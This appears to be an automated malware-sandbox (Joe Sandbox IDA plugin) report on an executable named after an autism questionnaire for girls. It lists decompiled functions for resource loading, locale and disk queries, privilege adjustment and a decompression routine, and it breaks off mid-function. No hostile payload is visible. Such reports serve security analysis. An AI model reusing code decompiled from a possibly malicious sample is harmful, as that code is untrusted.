                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                              • String ID: SeShutdownPrivilege
                                                                                              • API String ID: 107509674-3733053543
                                                                                              • Opcode ID: dbd0b99069aff0d6788c9efc2bbd2c2bb6d4dae2a155ecb9c3cc528dabbfbf9f
                                                                                              • Instruction ID: 15d82be9bc359c8987119149698676c325083c88dcd196a4f2f9cd1a299335ef
                                                                                              • Opcode Fuzzy Hash: dbd0b99069aff0d6788c9efc2bbd2c2bb6d4dae2a155ecb9c3cc528dabbfbf9f
                                                                                              • Instruction Fuzzy Hash: 75F06D70684301B5E610A6F2CD07F6B21C89B56B58FA00D3EBA84E91C2D7BDD81D42BF
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004AF9F0, Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004AF9F0() {
				struct HRSRC__* _t10;
				void* _t11;
				void* _t12;

				_t10 = FindResourceW(0, 0x2b67, 0xa);
				if(_t10 == 0) {
					E004AF834();
				}
				if(SizeofResource(0, _t10) != 0x2c) {
					E004AF834();
				}
				_t11 = LoadResource(0, _t10);
				if(_t11 == 0) {
					E004AF834();
				}
				_t12 = LockResource(_t11);
				if(_t12 == 0) {
					E004AF834();
				}
				return _t12;
			}






                                                                                              0x004af9ff
                                                                                              0x004afa03
                                                                                              0x004afa05
                                                                                              0x004afa05
                                                                                              0x004afa15
                                                                                              0x004afa17
                                                                                              0x004afa17
                                                                                              0x004afa24
                                                                                              0x004afa28
                                                                                              0x004afa2a
                                                                                              0x004afa2a
                                                                                              0x004afa35
                                                                                              0x004afa39
                                                                                              0x004afa3b
                                                                                              0x004afa3b
                                                                                              0x004afa43

                                                                                              APIs
                                                                                              • FindResourceW.KERNEL32(00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000,004B659E,?,00000000,004B65E2), ref: 004AF9FA
                                                                                              • SizeofResource.KERNEL32(00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000,004B659E), ref: 004AFA0D
                                                                                              • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000), ref: 004AFA1F
                                                                                              • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002), ref: 004AFA30
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                              • String ID:
                                                                                              • API String ID: 3473537107-0
                                                                                              • Opcode ID: 128b44542abe6d6e0e09835f67cf23f4a4e4be27e5836866f54195567a651b81
                                                                                              • Instruction ID: 8c15b2061d88d30e204a2d131290402b8da5209396f43898e5d703764eea749b
                                                                                              • Opcode Fuzzy Hash: 128b44542abe6d6e0e09835f67cf23f4a4e4be27e5836866f54195567a651b81
                                                                                              • Instruction Fuzzy Hash: FCE07E8074634625FA6436F718D7BAE00084B36B4DF40593FFA08A92D2EEAC8C19522E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040A4CC, Relevance: 4.6, APIs: 3, Instructions: 99COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 71%
                                                                                              			E0040A4CC(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				short _v182;
				short _v352;
				char _v356;
				char _v360;
				char _v364;
				int _t58;
				signed int _t61;
				intOrPtr _t70;
				signed short _t80;
				void* _t83;
				void* _t85;
				void* _t86;

				_t77 = __edi;
				_push(__edi);
				_v356 = 0;
				_v360 = 0;
				_v364 = 0;
				_v8 = __edx;
				_t80 = __eax;
				_push(_t83);
				_push(0x40a631);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83 + 0xfffffe98;
				E00407A20(_v8);
				_t85 = _t80 -  *0x4b7a08; // 0x404
				if(_t85 >= 0) {
					_t86 = _t80 -  *0x4b7c08; // 0x7c68
					if(_t86 <= 0) {
						_t77 = 0x40;
						_v12 = 0;
						if(0x40 >= _v12) {
							do {
								_t61 = _t77 + _v12 >> 1;
								if(_t80 >=  *((intOrPtr*)(0x4b7a08 + _t61 * 8))) {
									__eflags = _t80 -  *((intOrPtr*)(0x4b7a08 + _t61 * 8));
									if(__eflags <= 0) {
										E0040A3EC( *((intOrPtr*)(0x4b7a0c + _t61 * 8)), _t61, _v8, _t77, _t80, __eflags);
									} else {
										_v12 = _t61 + 1;
										goto L8;
									}
								} else {
									_t77 = _t61 - 1;
									goto L8;
								}
								goto L9;
								L8:
							} while (_t77 >= _v12);
						}
					}
				}
				L9:
				if( *_v8 == 0 && IsValidLocale(_t80 & 0x0000ffff, 2) != 0) {
					_t58 = _t80 & 0x0000ffff;
					GetLocaleInfoW(_t58, 0x59,  &_v182, 0x55);
					GetLocaleInfoW(_t58, 0x5a,  &_v352, 0x55);
					E0040858C( &_v356, 0x55,  &_v182);
					_push(_v356);
					_push(0x40a64c);
					E0040858C( &_v360, 0x55,  &_v352);
					_push(_v360);
					_push(E0040A65C);
					E0040858C( &_v364, 0x55,  &_v182);
					_push(_v364);
					E004087C4(_v8, _t58, 5, _t77, _t80);
				}
				_pop(_t70);
				 *[fs:eax] = _t70;
				_push(E0040A638);
				return E00407A80( &_v364, 3);
			}

















                                                                                              0x0040a4cc
                                                                                              0x0040a4d7
                                                                                              0x0040a4da
                                                                                              0x0040a4e0
                                                                                              0x0040a4e6
                                                                                              0x0040a4ec
                                                                                              0x0040a4ef
                                                                                              0x0040a4f3
                                                                                              0x0040a4f4
                                                                                              0x0040a4f9
                                                                                              0x0040a4fc
                                                                                              0x0040a502
                                                                                              0x0040a507
                                                                                              0x0040a50e
                                                                                              0x0040a510
                                                                                              0x0040a517
                                                                                              0x0040a519
                                                                                              0x0040a520
                                                                                              0x0040a526
                                                                                              0x0040a528
                                                                                              0x0040a52d
                                                                                              0x0040a537
                                                                                              0x0040a53e
                                                                                              0x0040a546
                                                                                              0x0040a558
                                                                                              0x0040a548
                                                                                              0x0040a549
                                                                                              0x00000000
                                                                                              0x0040a549
                                                                                              0x0040a539
                                                                                              0x0040a53b
                                                                                              0x00000000
                                                                                              0x0040a53b
                                                                                              0x00000000
                                                                                              0x0040a55f
                                                                                              0x0040a55f
                                                                                              0x0040a528
                                                                                              0x0040a526
                                                                                              0x0040a517
                                                                                              0x0040a564
                                                                                              0x0040a56a
                                                                                              0x0040a58e
                                                                                              0x0040a592
                                                                                              0x0040a5a3
                                                                                              0x0040a5b9
                                                                                              0x0040a5be
                                                                                              0x0040a5c4
                                                                                              0x0040a5da
                                                                                              0x0040a5df
                                                                                              0x0040a5e5
                                                                                              0x0040a5fb
                                                                                              0x0040a600
                                                                                              0x0040a60e
                                                                                              0x0040a60e
                                                                                              0x0040a615
                                                                                              0x0040a618
                                                                                              0x0040a61b
                                                                                              0x0040a630

                                                                                              APIs
                                                                                              • IsValidLocale.KERNEL32(?,00000002,00000000,0040A631,?,004162BC,?,00000000), ref: 0040A576
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,0040A631,?,004162BC,?,00000000), ref: 0040A592
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,0040A631,?,004162BC,?,00000000), ref: 0040A5A3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locale$Info$Valid
                                                                                              • String ID:
                                                                                              • API String ID: 1826331170-0
                                                                                              • Opcode ID: 62325bdbcd9f8bf22caa424e6d98428fadf2f4ef7d6ad95b5286de9b97f55654
                                                                                              • Instruction ID: 92a11a0233c3b219485afac9e49f2dea99407596d6f7a83949ef3a6145fdf69e
                                                                                              • Opcode Fuzzy Hash: 62325bdbcd9f8bf22caa424e6d98428fadf2f4ef7d6ad95b5286de9b97f55654
                                                                                              • Instruction Fuzzy Hash: 3831AE70A00308ABDF20DB64DD81BDEBBB9FB48701F5005BBA508B32D1D6395E90CE1A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041A4DC, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0041A4DC(WCHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				WCHAR* _t25;
				int _t26;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr* _t37;
				intOrPtr* _t38;
				intOrPtr _t46;
				intOrPtr _t48;

				_t25 = _a4;
				if(_t25 == 0) {
					_t25 = 0;
				}
				_t26 = GetDiskFreeSpaceW(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
				_v28 = _v8 * _v12;
				_v24 = 0;
				_t46 = _v24;
				_t31 = E004095A8(_v28, _t46, _v16, 0);
				_t37 = _a8;
				 *_t37 = _t31;
				 *((intOrPtr*)(_t37 + 4)) = _t46;
				_t48 = _v24;
				_t34 = E004095A8(_v28, _t48, _v20, 0);
				_t38 = _a12;
				 *_t38 = _t34;
				 *((intOrPtr*)(_t38 + 4)) = _t48;
				return _t26;
			}

















                                                                                              0x0041a4e3
                                                                                              0x0041a4e8
                                                                                              0x0041a4ea
                                                                                              0x0041a4ea
                                                                                              0x0041a4fd
                                                                                              0x0041a50c
                                                                                              0x0041a50f
                                                                                              0x0041a51c
                                                                                              0x0041a51f
                                                                                              0x0041a524
                                                                                              0x0041a527
                                                                                              0x0041a529
                                                                                              0x0041a536
                                                                                              0x0041a539
                                                                                              0x0041a53e
                                                                                              0x0041a541
                                                                                              0x0041a543
                                                                                              0x0041a54c

                                                                                              APIs
                                                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?), ref: 0041A4FD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: DiskFreeSpace
                                                                                              • String ID:
                                                                                              • API String ID: 1705453755-0
                                                                                              • Opcode ID: 35fab30d3ed47bb79bc7b5801678cd6b626cb6661b26d0a6d4a2aa78d0844cce
                                                                                              • Instruction ID: 14c90aad059d6341cd8fbca9d1c94cd423dd62e4f1f0ed92fc39ecac232c4210
                                                                                              • Opcode Fuzzy Hash: 35fab30d3ed47bb79bc7b5801678cd6b626cb6661b26d0a6d4a2aa78d0844cce
                                                                                              • Instruction Fuzzy Hash: 7711C0B5A01209AFDB04CF9ACD819EFB7F9EFC8304B14C569A505E7255E6319E018B94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041E034, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0041E034(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				short _v516;
				void* __ebp;
				int _t5;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				_t5 = GetLocaleInfoW(__eax, __edx,  &_v516, 0x100);
				_t19 = _t5;
				if(_t5 <= 0) {
					return E00407E00(_t10, _t18);
				}
				return E00407BA8(_t10, _t5 - 1,  &_v516, _t19);
			}








                                                                                              0x0041e03f
                                                                                              0x0041e041
                                                                                              0x0041e052
                                                                                              0x0041e057
                                                                                              0x0041e059
                                                                                              0x00000000
                                                                                              0x0041e071
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0041E052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoLocale
                                                                                              • String ID:
                                                                                              • API String ID: 2299586839-0
                                                                                              • Opcode ID: d1249f9bfb9152180de995f4510b089303b0330b3d36e5e1fa950d916a740853
                                                                                              • Instruction ID: c90943d4e22265a1f7ecf9aede9ac9faa011377f579ac525cbc4109061889d1c
                                                                                              • Opcode Fuzzy Hash: d1249f9bfb9152180de995f4510b089303b0330b3d36e5e1fa950d916a740853
                                                                                              • Instruction Fuzzy Hash: C7E09235B0421427E314A55A9C86AE7725D9B48340F40457FBD05D7382EDB9AE8042E9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041E080, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 79%
                                                                                              			E0041E080(int __eax, signed int __ecx, int __edx) {
				short _v16;
				signed int _t5;
				signed int _t10;

				_push(__ecx);
				_t10 = __ecx;
				if(GetLocaleInfoW(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t10;
				} else {
					_t5 = _v16 & 0x0000ffff;
				}
				return _t5;
			}






                                                                                              0x0041e083
                                                                                              0x0041e084
                                                                                              0x0041e09a
                                                                                              0x0041e0a2
                                                                                              0x0041e09c
                                                                                              0x0041e09c
                                                                                              0x0041e09c
                                                                                              0x0041e0a8

                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,0041E182,?,00000001,00000000,0041E391), ref: 0041E093
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoLocale
                                                                                              • String ID:
                                                                                              • API String ID: 2299586839-0
                                                                                              • Opcode ID: c2a2e253f202cad765f8f9b35123567cb33a3e9031303696ff7b3b42dc5ba059
                                                                                              • Instruction ID: 961adf842b5e4829a7f1cb68f4be235500f18d0b61d537998bbd462cca006134
                                                                                              • Opcode Fuzzy Hash: c2a2e253f202cad765f8f9b35123567cb33a3e9031303696ff7b3b42dc5ba059
                                                                                              • Instruction Fuzzy Hash: 45D05EBA31923476E214915B6E85DB75ADCCBC87A2F14483BBE4CC6241D2A4CC46A275
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004AF218, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004AF218(signed int __eax) {
				short _v8;
				signed int _t6;

				_t6 = GetLocaleInfoW(__eax & 0x0000ffff, 0x20001004,  &_v8, 2);
				if(_t6 <= 0) {
					return _t6 | 0xffffffff;
				}
				return _v8;
			}





                                                                                              0x004af22e
                                                                                              0x004af235
                                                                                              0x00000000
                                                                                              0x004af23c
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,004AF318), ref: 004AF22E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoLocale
                                                                                              • String ID:
                                                                                              • API String ID: 2299586839-0
                                                                                              • Opcode ID: 91ef75d91c3bf0fbfb4c903f00eadddcc0e9dd42321a82c412adf8826a4a964a
                                                                                              • Instruction ID: 3cbbb47bc5e3852376f83ef88ad8e7e21f22c900a58d153b56eed97a123c5839
                                                                                              • Opcode Fuzzy Hash: 91ef75d91c3bf0fbfb4c903f00eadddcc0e9dd42321a82c412adf8826a4a964a
                                                                                              • Instruction Fuzzy Hash: E8D0A5F55442087DF504C1DA5D82FB673DCD705374F500767F654C52C1D567EE015219
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0041C3D8, Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0041C3D8() {
				struct _SYSTEMTIME* _t2;

				GetLocalTime(_t2);
				return _t2->wYear & 0x0000ffff;
			}




                                                                                              0x0041c3dc
                                                                                              0x0041c3e8

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: LocalTime
                                                                                              • String ID:
                                                                                              • API String ID: 481472006-0
                                                                                              • Opcode ID: 2bbd9f916a85fd19aaf3e135de3c6f6031220cebfdbc254b78c71648618a48a1
                                                                                              • Instruction ID: 79eafb11b28f80ce797d6e9fe134e5764476c7cb5db39d72cf417c4d7be8b418
                                                                                              • Opcode Fuzzy Hash: 2bbd9f916a85fd19aaf3e135de3c6f6031220cebfdbc254b78c71648618a48a1
                                                                                              • Instruction Fuzzy Hash: DAA0122080582011D140331A0C0313530405900620FC40F55BCF8542D1E93D013440D7
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004255DC, Relevance: .5, Instructions: 545COMMONCrypto
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E004255DC(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				char _v25;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				char _v64;
				char* _v68;
				void* _v72;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				signed int _v88;
				char _v89;
				char _v96;
				signed int _v100;
				signed int _v104;
				short* _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				char _v136;
				signed int _t370;
				void* _t375;
				signed int _t377;
				signed int _t381;
				signed int _t389;
				signed int _t395;
				signed int _t411;
				intOrPtr _t422;
				signed int _t426;
				signed int _t435;
				void* _t448;
				signed int _t458;
				char _t460;
				signed int _t474;
				char* _t503;
				signed int _t508;
				signed int _t616;
				signed int _t617;
				signed int _t618;
				signed int _t622;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 =  *((intOrPtr*)(_v8 + 0x10));
				_v24 = 0;
				_v32 = (1 <<  *(_v8 + 8)) - 1;
				_v36 = (1 <<  *(_v8 + 4)) - 1;
				_v40 =  *_v8;
				_t617 =  *((intOrPtr*)(_v8 + 0x34));
				_t474 =  *(_v8 + 0x44);
				_v44 =  *((intOrPtr*)(_v8 + 0x38));
				_v48 =  *((intOrPtr*)(_v8 + 0x3c));
				_v52 =  *((intOrPtr*)(_v8 + 0x40));
				_v56 =  *((intOrPtr*)(_v8 + 0x48));
				_v60 =  *((intOrPtr*)(_v8 + 0x2c));
				_v64 =  *((intOrPtr*)(_v8 + 0x30));
				_v68 =  *((intOrPtr*)(_v8 + 0x1c));
				_v72 =  *((intOrPtr*)(_v8 + 0xc));
				_t616 =  *((intOrPtr*)(_v8 + 0x28));
				_v128 =  *((intOrPtr*)(_v8 + 0x20));
				_v124 =  *((intOrPtr*)(_v8 + 0x24));
				_v120 = _v12;
				_v136 =  *((intOrPtr*)(_v8 + 0x14));
				_v132 =  *((intOrPtr*)(_v8 + 0x18));
				 *_a4 = 0;
				if(_v56 == 0xffffffff) {
					return 0;
				}
				__eflags = _v72;
				if(_v72 == 0) {
					_v68 =  &_v76;
					_v72 = 1;
					_v76 =  *((intOrPtr*)(_v8 + 0x4c));
				}
				__eflags = _v56 - 0xfffffffe;
				if(_v56 != 0xfffffffe) {
					L12:
					_v108 = _v16 + _v24;
					while(1) {
						__eflags = _v56;
						if(_v56 == 0) {
							break;
						}
						__eflags = _v24 - _a8;
						if(_v24 < _a8) {
							_t458 = _t616 - _t617;
							__eflags = _t458 - _v72;
							if(_t458 >= _v72) {
								_t458 = _t458 + _v72;
								__eflags = _t458;
							}
							_t460 =  *((intOrPtr*)(_v68 + _t458));
							 *((char*)(_v68 + _t616)) = _t460;
							 *_v108 = _t460;
							_v24 = _v24 + 1;
							_v108 = _v108 + 1;
							_t616 = _t616 + 1;
							__eflags = _t616 - _v72;
							if(_t616 == _v72) {
								_t616 = 0;
								__eflags = 0;
							}
							_t116 =  &_v56;
							 *_t116 = _v56 - 1;
							__eflags =  *_t116;
							continue;
						}
						break;
					}
					__eflags = _t616;
					if(_t616 != 0) {
						_v25 =  *((intOrPtr*)(_v68 + _t616 - 1));
					} else {
						_v25 =  *((intOrPtr*)(_v68 + _v72 - 1));
					}
					__eflags = 0;
					_v116 = 0;
					_v112 = 0;
					while(1) {
						L24:
						_v108 = _v16 + _v24;
						__eflags = _v24 - _a8;
						if(_v24 >= _a8) {
							break;
						} else {
							goto L25;
						}
						while(1) {
							L25:
							_v88 = _v24 + _v60 & _v32;
							__eflags = _v116;
							if(_v116 != 0) {
								break;
							}
							__eflags = _v112;
							if(_v112 == 0) {
								_t370 = E00425334((_t474 << 4) + (_t474 << 4) + _v20 + _v88 + _v88,  &_v136);
								__eflags = _t370;
								if(_t370 != 0) {
									_t375 = E00425334(_t474 + _t474 + _v20 + 0x180,  &_v136);
									__eflags = _t375 != 1;
									if(_t375 != 1) {
										_v52 = _v48;
										_v48 = _v44;
										_v44 = _t617;
										__eflags = _t474 - 7;
										if(__eflags >= 0) {
											_t377 = 0xa;
										} else {
											_t377 = 7;
										}
										_t474 = _t377;
										_v56 = E004254E4(_v20 + 0x664, _v88,  &_v136, __eflags);
										_t503 =  &_v136;
										__eflags = _v56 - 4;
										if(_v56 >= 4) {
											_t381 = 3;
										} else {
											_t381 = _v56;
										}
										_v100 = E004253BC((_t381 << 6) + (_t381 << 6) + _v20 + 0x360, _t503, 6);
										__eflags = _v100 - 4;
										if(_v100 < 4) {
											_t618 = _v100;
										} else {
											_v104 = (_v100 >> 1) - 1;
											_t524 = _v104;
											_t622 = (_v100 & 0x00000001 | 0x00000002) << _v104;
											__eflags = _v100 - 0xe;
											if(_v100 >= 0xe) {
												_t395 = E004252D4( &_v136, _t524, _v104 + 0xfffffffc);
												_t618 = _t622 + (_t395 << 4) + E00425400(_v20 + 0x644,  &_v136, 4);
											} else {
												_t618 = _t622 + E00425400(_t622 + _t622 + _v20 + 0x560 - _v100 + _v100 + 0xfffffffe,  &_v136, _v104);
											}
										}
										_t617 = _t618 + 1;
										__eflags = _t617;
										if(_t617 != 0) {
											L82:
											_v56 = _v56 + 2;
											__eflags = _t617 - _v64;
											if(_t617 <= _v64) {
												__eflags = _v72 - _v64 - _v56;
												if(_v72 - _v64 <= _v56) {
													_v64 = _v72;
												} else {
													_v64 = _v64 + _v56;
												}
												while(1) {
													_t389 = _t616 - _t617;
													__eflags = _t389 - _v72;
													if(_t389 >= _v72) {
														_t389 = _t389 + _v72;
														__eflags = _t389;
													}
													_v25 =  *((intOrPtr*)(_v68 + _t389));
													 *((char*)(_v68 + _t616)) = _v25;
													_t616 = _t616 + 1;
													__eflags = _t616 - _v72;
													if(_t616 == _v72) {
														_t616 = 0;
														__eflags = 0;
													}
													_v56 = _v56 - 1;
													 *_v108 = _v25;
													_v24 = _v24 + 1;
													_v108 = _v108 + 1;
													__eflags = _v56;
													if(_v56 == 0) {
														break;
													}
													__eflags = _v24 - _a8;
													if(_v24 < _a8) {
														continue;
													}
													break;
												}
												L93:
												__eflags = _v24 - _a8;
												if(_v24 < _a8) {
													continue;
												}
												goto L94;
											}
											return 1;
										} else {
											_v56 = 0xffffffff;
											goto L94;
										}
									}
									_t411 = E00425334(_t474 + _t474 + _v20 + 0x198,  &_v136);
									__eflags = _t411;
									if(_t411 != 0) {
										__eflags = E00425334(_t474 + _t474 + _v20 + 0x1b0,  &_v136);
										if(__eflags != 0) {
											__eflags = E00425334(_t474 + _t474 + _v20 + 0x1c8,  &_v136);
											if(__eflags != 0) {
												_t422 = _v52;
												_v52 = _v48;
											} else {
												_t422 = _v48;
											}
											_v48 = _v44;
										} else {
											_t422 = _v44;
										}
										_v44 = _t617;
										_t617 = _t422;
										L65:
										_v56 = E004254E4(_v20 + 0xa68, _v88,  &_v136, __eflags);
										__eflags = _t474 - 7;
										if(_t474 >= 7) {
											_t426 = 0xb;
										} else {
											_t426 = 8;
										}
										_t474 = _t426;
										goto L82;
									}
									__eflags = E00425334((_t474 << 4) + (_t474 << 4) + _v20 + _v88 + _v88 + 0x1e0,  &_v136);
									if(__eflags != 0) {
										goto L65;
									}
									__eflags = _v64;
									if(_v64 != 0) {
										__eflags = _t474 - 7;
										if(_t474 >= 7) {
											_t508 = 0xb;
										} else {
											_t508 = 9;
										}
										_t474 = _t508;
